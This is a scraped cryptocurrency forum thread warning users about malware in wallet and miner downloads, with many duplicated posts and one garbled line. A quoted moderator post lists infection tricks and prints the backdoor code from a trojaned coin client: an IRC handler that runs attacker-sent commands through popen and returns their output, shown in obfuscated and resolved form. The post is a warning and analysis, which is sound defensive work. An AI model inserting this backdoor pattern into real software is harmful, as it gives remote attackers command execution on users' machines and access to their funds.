Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 10. (Read 834878 times)
I hope to have a healthy community and warn the coin to show signs of scam
correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.
yes most of the malware are executable files in windows operating system but this doesn't mean that malware can't affect other operating system such as MAC and Linux Distro there are other malware and viruses that can also penetrate other operating OS the key is to make sure that we will not easily fall to the trap of this people who are taking advantage of newbies.
Always beware of increased sophisticated malware infection attempts and just believe.
double authentication is the best thing you can think of !!!
I agree to the whole 100%
I agree to the whole 100%
Now a days a lot of phishing and malware infected hacking attempts are happening due to bad guys
who want to steel your personal information specially private keys. Block chain technology is a good
technology but still it has a lot of problems that need to be addressed. I want in every cryptocurrency
wallet there should be double factor authentication key that work with Google authenticator.
who want to steel your personal information specially private keys. Block chain technology is a good
technology but still it has a lot of problems that need to be addressed. I want in every cryptocurrency
wallet there should be double factor authentication key that work with Google authenticator.
I've seen some ads on FB and Google that takes you to a page that installs mining scripts too...
a year ago, my email was hacked. After that, the coins were withdrawn from the exchange . It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing
It is better to have special e-mail for exchange with 2FA enabled and special smartphone with Google application. You don’t have to use this e-mail and smartphone for any other purposes.
I'm quite impressed by the power and imagination of hackers to find the weakness and explote it everywhere !
finally you never know if you are 100% safe or not.
Just be carefull as much as possible
finally you never know if you are 100% safe or not.
Just be carefull as much as possible
Tell me, is it so MAC OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
What security system to do to avoid falling into the trap of cybercriminals and how to understand that it is cybercriminals ? "latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
I had a similar issue last year, when I was sent a free trading bot by an online acquitance who I met in a telegram trading group. I left the file to download while I took a nap only to wake up to the most unfortunate incidence, all my trading accounts were wiped. I still cannot fathom, how it got access to the trading accounts without 2FA, though my phone was beside my laptop. I regret leaving my accounts opened on the browser. My advice is to abstain from downloading free softwares, or any application you don't understand, it's pretty risky. God help us.
There is a new type of malware and account stealing for MEW. Its called MEWkit. It steals money from the victim’s wallet through a front-end program that mimics the MyEtherWallet.
Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was informed by the official MEW account on twitter.
Another one targets airdrops. They basically ask you to fill out a form with all you info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was informed by the official MEW account on twitter.
yes it is very dangerous, we must be very careful
I am used to bookmarking important sites to avoid being directed to such things
I also usually check the site twice before filling in important data
This is really rampant nowadays. Offline wallet can still make us secure no matter what
I'm an invalid code and looking out the hole. sad and sorry, but do not know this copy.authenticate does not think to a currency 
Ive been alarmed by this post. Sometimes it really helps when you read on a forum like this.. But my concern is, how can i detect those malware infections if i dont have any experience and knowledge about the codes that their using..? Sometimes i just click on links, and i dont know if clicking certain links will cause infections on my device, and i will loose all my data or theres a possibility that i will be hacked. Online thing is really dangerous.
Anyaways this post is very informative, and keep reminding everyone to be extra careful.
Anyaways this post is very informative, and keep reminding everyone to be extra careful.
Thank you for sharing tips and information like this. I found this link in this thread https://bitcointalksearch.org/topic/how-i-met-my-scammer-3839038 which is also quite useful to me as a new member of this forum.
Thanks for being on top of this and keeping us informed, we do appreciate it!
Are the malware attempts still going on? What care should be taken as a beginner?
I use antivirus Avast Premier - I forgot what viruses, rootkits and other mucks. Very satisfied with this product! I recommend to everyone! It is especially important to have an antivirus if you use a software purse.
a year ago, my email was hacked. After that, the coins were withdrawn from the exchange . It cost about 3,5k$. 2 FA has not been installed. Gmail mail return failed. Many contacts are missing
I am deeply saddened to hear that. Same way with my friends they share s the same reason hacker took a lot of their earnings it's also a large cost and they regret what happened but still its great lessoned for them and learned what happened so for you next time be aware and secured your accounts as much as possible we put so much effort and time earning those token.
Jump to: